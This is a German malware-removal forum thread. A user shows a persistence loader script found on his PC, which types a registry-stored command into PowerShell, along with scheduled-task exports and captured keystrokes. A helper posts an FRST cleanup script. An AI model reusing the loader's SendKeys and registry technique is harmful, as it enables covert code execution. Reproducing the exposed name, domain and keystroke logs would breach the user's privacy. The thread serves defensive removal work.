Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: Keylogger am Werk?

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML.

Thema geschlossen
Alt 25.03.2024, 01:45   #1
dslthomas
 
Keylogger am Werk? - Standard

Keylogger am Werk?



Moin, Moin,

nun muss ich leider auch dieses Board in Anspruch nehmen. Ich habe das Problem, dass ich mir einen Keylogger etc. eingefangen habe. Es hatte sich bemerkbar gemacht, indem mein Browserfenster in den Vollbildmodus wechselte (Habe das sonst nur im unterem Bildschirmbereich offen) und es versuchte "jemand" die Paypal-Seite aufzurufen. Das ist erst mal ok (Gerade weil ich kein PayPal habe ).

Hier mal meine Beobachtungen und Vermutungen in Stichworten:
  • Es muss Scriptgesteuert gewesen sein, da dieser Vorgang auch OHNE Netzwerk weiter ging
  • Er legte einige VB-Scripte und com.exe-Dateien in meinem *\AppData\Roaming ab
  • Es fanden sich verschiede Reg-Keys unter HKEY_CURRENT_USER\Software\yRkawdXSgdbJmzp
  • Im Verzeichnis *\AppData\Roaming\Microsoft\Windows\Templates\ befanden sich ebenfalls JavaScript-Dateien welche die gleiche Benamung wie die Reg-Keys hatte (yRkawdXSgdbJmzp.js)

Inhalt der Datei yRkawdXSgdbJmzp.js:
Code:
ATTFilter
//yRkawdXSgdbJmzp
var objShell = new ActiveXObject("WScript.Shell");

function IsProcessRunning(processName) {
    var objWMIService = GetObject("winmgmts:\\\\.\\root\\cimv2");
    var colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" + processName + "'");
    
    return colProcesses.Count > 0;
}

function RunPowerShellCommands() {
    var windowsDir = objShell.ExpandEnvironmentStrings("%windir%");
    objShell.Run(windowsDir + "\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", 2);
    
    var colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process");
    var enumerator = new Enumerator(colProcesses);
    
    for (; !enumerator.atEnd(); enumerator.moveNext()) {
        var objProcess = enumerator.item();
        if (objProcess.Name.toLowerCase() === "powershell.exe") {
            objShell.AppActivate(objProcess.ProcessId);
            objShell.SendKeys(objShell.RegRead("HKEY_CURRENT_USER\\Software\\yRkawdXSgdbJmzp\\v"));
            objShell.SendKeys("{ENTER}");
            objShell.SendKeys("Stop-Process -Name conhost -Force");
            objShell.SendKeys("{ENTER}");
            
            WScript.Sleep(5000);
            break;
        }
    }
}

for (var i = 0; i <= 10000; i++) {
    if (!IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\\Software\\yRkawdXSgdbJmzp\\i"))) {
        RunPowerShellCommands();
    }
    
    WScript.Sleep(10000);
}
         

Ein Registry-Eintrag dazu findet sich hier:

Code:
ATTFilter
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6}]
"Path"="\\yRkawdXSgdbJmzp"
"Hash"=hex:7b,1f,86,91,3e,8d,64,5d,08,d6,20,87,56,d1,64,27,4d,73,c8,62,65,5a,\
  99,7d,f7,e8,a0,c8,34,c4,78,05
"Schema"=dword:00010002
"URI"="\\yRkawdXSgdbJmzp"
"Triggers"=hex:17,00,00,00,00,00,00,00,01,07,03,00,00,00,06,00,00,80,63,3b,59,\
  6f,da,01,00,07,03,00,00,00,06,00,ff,ff,ff,ff,ff,ff,ff,ff,38,21,41,42,48,48,\
  48,48,76,7d,16,a8,48,48,48,48,0e,00,00,00,48,48,48,48,41,00,75,00,74,00,68,\
  00,6f,00,72,00,00,00,48,48,00,00,00,00,48,48,48,48,00,48,48,48,48,48,48,48,\
  00,48,48,48,48,48,48,48,01,00,00,00,48,48,48,48,1c,00,00,00,48,48,48,48,01,\
  05,00,00,00,00,00,05,15,00,00,00,5b,fd,fa,f6,ac,1a,e5,15,b1,e5,31,30,53,04,\
  00,00,48,48,48,48,2c,00,00,00,48,48,48,48,54,00,48,00,4f,00,4d,00,41,00,53,\
  00,2d,00,52,00,45,00,49,00,43,00,48,00,45,00,4c,00,5c,00,74,00,68,00,6f,00,\
  6d,00,61,00,73,00,00,00,48,48,48,48,2c,00,00,00,48,48,48,48,58,02,00,00,10,\
  0e,00,00,80,f4,03,00,ff,ff,ff,ff,07,00,00,00,00,00,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,48,48,48,48,dd,dd,00,00,00,00,00,\
  00,01,07,03,00,00,00,06,00,00,80,63,3b,59,6f,da,01,00,00,00,00,00,00,00,00,\
  00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,3c,\
  00,00,00,00,00,00,00,ff,ff,ff,ff,00,00,00,00,00,00,00,00,00,00,00,00,00,01,\
  f8,9e,01,00,00,00,00,00,00,00,75,02,00,00,00,00,00,00,48,48,48,48
"Actions"=hex:03,00,0c,00,00,00,41,00,75,00,74,00,68,00,6f,00,72,00,66,66,00,\
  00,00,00,ba,00,00,00,43,00,3a,00,5c,00,55,00,73,00,65,00,72,00,73,00,5c,00,\
  54,00,68,00,6f,00,6d,00,61,00,73,00,2e,00,54,00,48,00,4f,00,4d,00,41,00,53,\
  00,2d,00,52,00,45,00,49,00,43,00,48,00,45,00,4c,00,5c,00,41,00,70,00,70,00,\
  44,00,61,00,74,00,61,00,5c,00,52,00,6f,00,61,00,6d,00,69,00,6e,00,67,00,5c,\
  00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,57,00,69,00,\
  6e,00,64,00,6f,00,77,00,73,00,5c,00,54,00,65,00,6d,00,70,00,6c,00,61,00,74,\
  00,65,00,73,00,5c,00,79,00,52,00,6b,00,61,00,77,00,64,00,58,00,53,00,67,00,\
  64,00,62,00,4a,00,6d,00,7a,00,70,00,2e,00,6a,00,73,00,00,00,00,00,00,00,00,\
  00,00,00
"DynamicInfo"=hex:03,00,00,00,47,59,25,20,37,7e,da,01,b6,57,26,15,48,7e,da,01,\
  00,00,00,00,e0,10,07,80,45,bc,39,f8,45,7e,da,01
         
und einer hier:

Code:
ATTFilter
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\yRkawdXSgdbJmzp]
"SD"=hex:01,00,04,80,88,00,00,00,98,00,00,00,00,00,00,00,14,00,00,00,02,00,74,\
  00,04,00,00,00,00,10,18,00,9f,01,1f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
  20,02,00,00,00,10,14,00,9f,01,1f,00,01,01,00,00,00,00,00,05,12,00,00,00,00,\
  10,18,00,ff,01,1f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,\
  24,00,89,00,12,00,01,05,00,00,00,00,00,05,15,00,00,00,5b,fd,fa,f6,ac,1a,e5,\
  15,b1,e5,31,30,53,04,00,00,d0,76,3e,0d,01,02,00,00,00,00,00,05,20,00,00,00,\
  20,02,00,00,01,05,00,00,00,00,00,05,15,00,00,00,5b,fd,fa,f6,ac,1a,e5,15,b1,\
  e5,31,30,01,02,00,00
"Id"="{97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6}"
"Index"=dword:00000003
         
Hier nun die Logs.. hxxp://5.189.183.113/FIRST.txt

und die hxxp://5.189.183.113/Addition.txt



Zu HiJackThis-Zeiten war es für mich einfacher die Logs zu sichten bzw mit Hilfe auszuwerten. Nun bin ich wirklich komplett auf Eure Hilfe angewiesen. F-Secure sagt keinen Mucks.

Ach ja,- wie komme ich auf Keylogger.... Nun es wurde ein Registry-Key erstellt, wo offensichtlich alles abgelegt wurde:

Code:
ATTFilter
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\3cec14c682a69cb8fafb5026acd55133]
"[kl]"=" 24.03.24 powershell Windows PowerShell eoteNc.lKc 24.03.24 TOTALCMD64 Total Commander (x64) 11.03 l[ENTER]regereged[Delete] 24.03.24 TOTALCMD64 Total Commander (x64) 11.03 [ENTER] 24.03.24 TOTALCMD64 Total Commander (x64) 11.03 .zaak[ENTER] 24.03.24 chrome \"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window --win-session-start - Google Suche - Google Chrome [Back]\"[ENTER] 24.03.24 chrome MicrosoftEdgeAutoLaunch_22BF80BC2136A2C83F26CA891AE199D8 - Google Suche - Google Chrome [Back][ENTER] 24.03.24 explorer Opera ...[Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]192.168.0.30[ENTER] 24.03.24 chrome B0A95C82BA6D3B5A9F4A - Google Suche - Google Chrome Changzih[ENTER] 24.03.24 chrome Changzhi - Google Suche - Google Chrome  HKCU[ENTER] 24.03.24 TOTALCMD64 Total Commander (x64) 11.03 [Back][ENTER]hjt[ENTER][Back][ENTER] 24.03.25 chrome Neuer Tab - Google Chrome  log auswerten[ENTER] 24.03.25 chrome www.hijackthis.de - Google Chrome [Back][Back][ENTER] 24.03.25 explorer hjt [Delete] 24.03.25 chrome Trojaner-Board - Neues Thema erstellen - Google Chrome Keylogger am Werk?Moin, Moin,[ENTER]nun muss ich leider auch mal wieder d[Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]dieses Board in Anspruch nehmen. Ich habe das Problem, dass ich mir einen Keylogger etc. eingefangen habe. Es hatte sich bemerkbar gemacht, indem mein Bw[Back]rowserfenster in den Vollbildmodus wechselte (Habe das sonst nur im unterem Bildschirmbereich offen) und es versuchte sich jemand mir [Back][Back]t [Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back][Back]\"jemand\" die Paypal-Seite aufzurufen. Das ist erst mal ok (Gerade weil ich kein PayPal habe :-) [Back][Back][Back][Back] ). Der Z[Back][Back][Back][Back][Back][Back][ENTER]Hier mal meine Beobachtungen und vermutungen in Stichworten:[ENTER]Es muss Scriptgesteuert gewesen sein, da dieser Vorgang auch OHNE Netzwerk weiter gingEr legte einige VB-Scripte und com.exe-Dateien in meinem AppData/Local abEs fanden sich verschiede Reg-Kay[Back][Back]es[Back]ys unter HKEY_CURRENT_USERSoftwareyRkawdb ....[Delete][Delete]Roaming[Back][ENTER]*Im Verzeichnis [Back]** befanden sich ebenfalls JavaScript-Dateien welche die gleiche Beh[Back]nahmung wie die Reg-Keys hatte ()[ENTER]Inhalt der Datei .js [Back]:[ENTER] 24.03.25 TOTALCMD64 [2] Total Commander (x64) 11.03 [Delete] 24.03.25 TOTALCMD64 [2] Total Commander (x64) 11.03 [ENTER] 24.03.25 chrome Trojaner-Board - Neues Thema erstellen - Google Chrome Hier nun die Logs:[Back].. FRST.txt[ENTER]und die Additional[Back][Back].txt:[ENTER]Zu -Zeiten war es für mich einfacher die Logs zu sichten bzw mit Hilfe auszuwerten. Nun bin ich wirklich komplett auf Eure Hilfe angewiesen. F-Secure sagt keinen Muks[Back][Back]cks [Back].  24.03.25 TOTALCMD64 [2] Total Commander (x64) 11.03 [Delete] 24.03.25 TOTALCMD64 [2] Total Commander (x64) 11.03 [ENTER] 24.03.25 chrome Trojaner-Board - Neues Thema erstellen - Google Chrome Ein Registry-Eintrag dazu findet sich hier:[ENTER]und einer hier:[ENTER]"
         
der hat sogar jetzt noch alles mit geloggt.....

Wie bekomme ich den Sch... weg ohne neu zu installieren? Der Aufwand wäre immens zumal ich nicht weis, wie das ganze ins System gelangt ist.

Danke und Gruß aus Hamburg.

Alt 25.03.2024, 09:01   #2
M-K-D-B
/// TB-Ausbilder
 
Keylogger am Werk? - Standard

Keylogger am Werk?







Mein Name ist Matthias und ich werde dir bei der Analyse und Bereinigung deines Systems helfen.



Ich analysiere dein System und melde mich später wieder.



Die Logdateien von FRST oder anderen Tools kannst du zukünftig direkt hier als Antwort in Code-Tags reinposten, z. B. so:

Code:
ATTFilter
Hier ist die Logdatei
         
__________________


Alt 25.03.2024, 12:27   #3
M-K-D-B
/// TB-Ausbilder
 
Keylogger am Werk? - Standard

Keylogger am Werk?



Ich analysiere Logdateien jetzt schon seit über 12 Jahren, aber diese Malware habe ich noch nicht gesehen... es gibt immer was Neues.

Skript-basierte Schadsoftware (JS, BAT, VBS, PS, etc.) wie hier ist meist sehr intelligent gemacht, ziemlich "verwinkelt" alles... und schwer zu erkennen.
Wir sollten sie aber entfernen können, insbesondere da du dich am Computer auskennst.


Wir beginnen zuerst mit einer Reparatur mit FRST. Diese kann durchaus einige Minuten dauern.
Damit entfernen wir alle aktiven Komponenten der Malware. Zudem lesen wir ein paar Ordner und Schlüssel aus, um evtl. weitere Komponenten der Malware aufzuspühren. Zudem setzen wir die Windows Firewall zurück und leeren die temporären Speicherbänke.
Ebenso entfernen wir verwaiste Einträge sowie Dateien an ungewöhnlichen Pfaden.

Weitere Schritte werden folgen.





Schritt 1
WARNUNG AN ALLE MITLESER !!!
Dieses FRST-Skript ist ausschließlich für diesen Nutzer gedacht und sollte niemals 1:1 für ein anderes System verwendet werden!
  • Speichere deine Arbeiten und schließe alle offenen Programme, damit keine Daten verloren gehen.
  • Kopiere den gesamten Inhalt der folgenden Code-Box wie folgt:
    Markiere den gesamten Inhalt der folgenden Code-Box mit der Maus und kopiere ihn (gleichzeitiges Drücken der beiden Tasten "STRG" + "C"):
    Code:
    ATTFilter
    Start::
    SystemRestore: On 
    CreateRestorePoint:
    CloseProcesses:
    ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> Keine Datei
    ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} =>  -> Keine Datei
    ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} =>  -> Keine Datei
    ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> Keine Datei
    ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> Keine Datei
    ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} =>  -> Keine Datei
    ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} =>  -> Keine Datei
    ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  -> Keine Datei
    ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} =>  -> Keine Datei
    ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} =>  -> Keine Datei
    ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  -> Keine Datei
    ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  -> Keine Datei
    ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} =>  -> Keine Datei
    ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} =>  -> Keine Datei
    ContextMenuHandlers6: [ContMenu] -> {FCF608CF-5716-47C3-A1A8-991D873AF72B} =>  -> Keine Datei
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = 
    HKU\S-1-5-21-3460856420-2582145234-728948223-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-21-4143643995-367336108-808576433-1107\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    BHO: Kein Name -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> Keine Datei
    BHO-x32: Kein Name -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> Keine Datei
    Toolbar: HKLM - Kein Name - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -  Keine Datei
    Toolbar: HKLM-x32 - Kein Name - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -  Keine Datei
    HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\StartupApproved\Run: => "OneDrive GsAofCNyJa"
    HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\StartupApproved\Run: => "OneDrive ShidVxuBhh"
    HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\StartupApproved\StartupFolder: => "AppData.exe"
    C:\Users\AllUserName\AppData\Roaming\Deskt.exe
    C:\Users\AllUserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Desktop.exe
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\Run: [AdobeBridge] => [X]
    HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\Run: [] => [X]
    HKU\S-1-5-21-4143643995-367336108-808576433-1107\...\Winlogon: [Shell] explorer.exe,C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs\AppData.exe, <==== ACHTUNG
    File: C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs\AppData.exe
    C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs
    HKLM\Software\...\Authentication\Credential Providers: [{C885AA15-1764-4293-B82A-0586ADD46B35}] -> 
    Task: {9FA8515B-F007-4624-90D9-859C02C34812} - System32\Tasks\Microsoft\Windows\GroupPolicy\{3E0A038B-D834-4930-9981-E89C9BFF83AA} => C:\WINDOWS\system32\gpupdate.exe [53248 2024-03-14] (Microsoft Windows -> Microsoft Corporation)
    Task: {F9E3B3CF-1D15-41B5-8765-D0ADC55474D5} - System32\Tasks\Microsoft\Windows\GroupPolicy\{A7719E0F-10DB-4640-AD8C-490CC6AD5202} => C:\WINDOWS\system32\gpupdate.exe [53248 2024-03-14] (Microsoft Windows -> Microsoft Corporation)
    StartupDir: %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Programs <==== ACHTUNG
    GroupPolicy: Beschränkung ? <==== ACHTUNG
    Policies: C:\ProgramData\NTUSER.pol: Beschränkung <==== ACHTUNG
    HKLM\SOFTWARE\Policies\Microsoft\Edge: Beschränkung <==== ACHTUNG
    Task: {E5CDE7D5-8E9C-4E6A-8F23-5180D9D79571} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe  --automatic (Keine Datei)
    Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => %SystemRoot%\System32\MbaeParserTask.exe  (Keine Datei)
    Task: {5E0AD918-FE0B-47F9-BE79-CE17564845EC} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_AC => %systemroot%\system32\MusNotification.exe  /RunOnAC RebootDialog (Keine Datei)
    Task: {58D77E8D-A3B3-4C34-B5E7-D9737015349A} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery => %systemroot%\system32\MusNotification.exe  /RunOnBattery RebootDialog (Keine Datei)
    Task: {E0F10DCF-44AD-40E8-9370-FB5DA59F93FB} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe  (Keine Datei)
    CMD: type "C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js"
    CMD: type "C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js"
    Task: {62BCCF6C-F99B-4298-802F-F4E862B9E379} - System32\Tasks\puTcVzRKiKPfhBC => C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js [1424 2024-03-24] () [Datei ist nicht signiert] <==== ACHTUNG
    Task: {97E873B8-E0BC-4E2C-A97B-2BFF2CD6D8E6} - System32\Tasks\yRkawdXSgdbJmzp => C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js [1424 2024-03-24] () [Datei ist nicht signiert] <==== ACHTUNG
    File: C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js
    C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Microsoft\Windows\Templates\puTcVzRKiKPfhBC.js
    File: C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js
    C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Microsoft\Windows\Templates\yRkawdXSgdbJmzp.js
    Edge Notifications: Default -> hxxps://web.whatsapp.com
    CHR Notifications: Default -> hxxps://app.sipgate.com; hxxps://calendar.google.com; hxxps://community.symcon.de; hxxps://forum-ukraine.de; hxxps://forum.fritzing.org; hxxps://kundenbereich.check24.de; hxxps://nas.thomas-reichel.com; hxxps://web.telegram.org; hxxps://www.facebook.com; hxxps://www.instagram.com; hxxps://www.lieferando.de; hxxps://www.romeo.com; hxxps://www.scenic-forum.de
    FF user.js: detected! => C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Mozilla\Firefox\Profiles\5pbxmky2.default\user.js [2023-06-10]
    FF user.js: detected! => C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Mozilla\Firefox\Profiles\37niltkt.default-release\user.js [2023-06-10]
    FF HKLM\...\Firefox\Extensions: [bdwtwe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi => nicht gefunden
    FF HKLM-x32\...\Firefox\Extensions: [bdwtwe@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender Security\bdwteff.xpi => nicht gefunden
    S3 semav6msr64; \??\C:\Windows\system32\drivers\semav6msr64.sys [X]
    2021-05-04 04:00 - 2021-05-09 16:01 - 000000128 ____H () C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6
    2024-03-24 23:08 - 2022-11-04 06:02 - 000069632 _____ (Microsoft Corporation) C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\MSBuild.exe
    2024-03-24 23:09 - 2022-11-04 06:02 - 000032768 _____ (Microsoft Corporation) C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\RegSvcs.exe
    Unlock: C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\Microsoft\Teams
    2023-03-11 19:31 - 2023-03-11 19:31 - 000000069 _____ () C:\Program Files (x86)\dialogysclip.bat
    2023-03-11 19:29 - 2023-03-11 19:55 - 000001785 _____ () C:\Program Files (x86)\DialogysUninstWPS.bat
    2022-02-26 14:35 - 2022-02-26 14:35 - 000000030 _____ () C:\Program Files (x86)\Exiferupdate.ini
    2023-03-11 19:29 - 2023-03-11 19:29 - 000000844 _____ () C:\Program Files (x86)\INSTALL.LOG
    2023-10-07 17:08 - 2023-10-07 17:08 - 000001082 _____ () C:\Program Files (x86)\MacroRecorder.lnk
    2023-03-11 19:29 - 2017-11-08 16:09 - 000176040 _____ () C:\Program Files (x86)\UninstScript.EXE
    2021-05-04 04:00 - 2021-05-09 16:01 - 000000128 ____H () C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\ecf00c38dc807e105d881c433a6b455dd2c606b6
    2024-03-24 23:08 - 2022-11-04 06:02 - 000069632 _____ (Microsoft Corporation) C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\MSBuild.exe
    2024-03-24 23:09 - 2022-11-04 06:02 - 000032768 _____ (Microsoft Corporation) C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\RegSvcs.exe
    2024-03-11 15:12 - 2024-03-11 15:12 - 000174062 _____ () C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\rvhost.vbe.zaak
    2021-02-03 04:26 - 2024-03-19 21:50 - 000000128 _____ () C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\winscp.rnd
    2022-09-25 10:16 - 2022-09-25 10:35 - 001163406 _____ () C:\Users\Thomas.THOMAS-REICHEL\AppData\Roaming\WrapAnGo_Install.log
    2021-12-19 16:02 - 2021-12-19 16:02 - 000001456 _____ () C:\Users\Thomas.THOMAS-REICHEL\AppData\Local\Adobe Für Web speichern 13.0 Prefs
    2021-02-03 06:28 - 2021-10-29 18:02 - 000018432 _____ () C:\Users\Thomas.THOMAS-REICHEL\AppData\Local\https_www.amazon.de_0.localstorage
    2022-08-21 05:36 - 2022-08-21 05:36 - 000000000 _____ () C:\Users\Thomas.THOMAS-REICHEL\AppData\Local\{9F850872-AAD4-4482-A31A-2969AE3AEF22}
    CMD: reg query "HKCU\Software\yRkawdXSgdbJmzp" /S
    DeleteKey: HKCU\Software\yRkawdXSgdbJmzp
    CMD: reg query "HKCU\Software\3cec14c682a69cb8fafb5026acd55133" /S
    DeleteKey: HKCU\Software\3cec14c682a69cb8fafb5026acd55133
    CMD: reg query "HKCU\Software"
    CMD: reg query "HKLM\Software" /reg:32
    CMD: reg query "HKLM\Software" /reg:64
    CMD: dir /A "c:\users\public"
    CMD: dir /A "C:\Users\Thomas.THOMAS-REICHEL"
    CMD: cscript /nologo %systemroot%\System32\slmgr.vbs /dlv
    CMD: netsh winsock reset
    CMD: netsh advfirewall reset
    CMD: netsh advfirewall set allprofiles state ON
    CMD: netsh winhttp reset proxy
    CMD: Bitsadmin /Reset /Allusers
    CMD: Winmgmt /salvagerepository 
    CMD: Winmgmt /verifyrepository
    CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
    CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
    CMD: "%WINDIR%\SYSTEM32\lodctr.exe" /R
    CMD: "%WINDIR%\SysWOW64\lodctr.exe" /R
    Hosts:
    RemoveProxy:
    EmptyTemp:
    End::
             
  • Starte nun FRST und klicke direkt auf den Button Reparieren.
    Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!

  • Wichtig:
    • Bitte gedulde dich, sobald du die Reparatur gestartet hast. Je nach Art und Umfang der notwendigen Reparaturen kann dies einige Minuten dauern.
      Eventuell erhältst du während der Reparatur auch die Information "keine Rückmeldung" von FRST. Das ist normal, du musst nichts weiter tun, nur warten.
    • Mit dieser Reparatur werden alle temporären Dateien/Browserdaten sowie der Papierkorb gelöscht.
    • Mit dieser Reparatur werden die Windows Firewall-Einstellungen zurückgesetzt. Du wirst möglicherweise später aufgefordert, legitimen Programmen eine Erlaubnis/Ausnahme für die Firewall zu erteilen. Dies solltest du dann erlauben/zulassen.

  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich FRST befindet.
  • Gegebenenfalls muss dein Rechner neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.
__________________

Alt 25.03.2024, 16:41   #4
dslthomas
 
Keylogger am Werk? - Standard

Keylogger am Werk?



erst einmal danke für deine Unterstützung. Hier das Log:

Code:
ATTFilter
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 25.03.2024
durchgeführt von thomas (25-03-2024 15:41:47) Run:1
Gestartet von D:\hjt
Geladene Profile: Thomas & thomas
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
Start::
SystemRestore: On
CreateRestorePoint:
CloseProcesses:
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Keine Datei
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Keine Datei
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Keine Datei
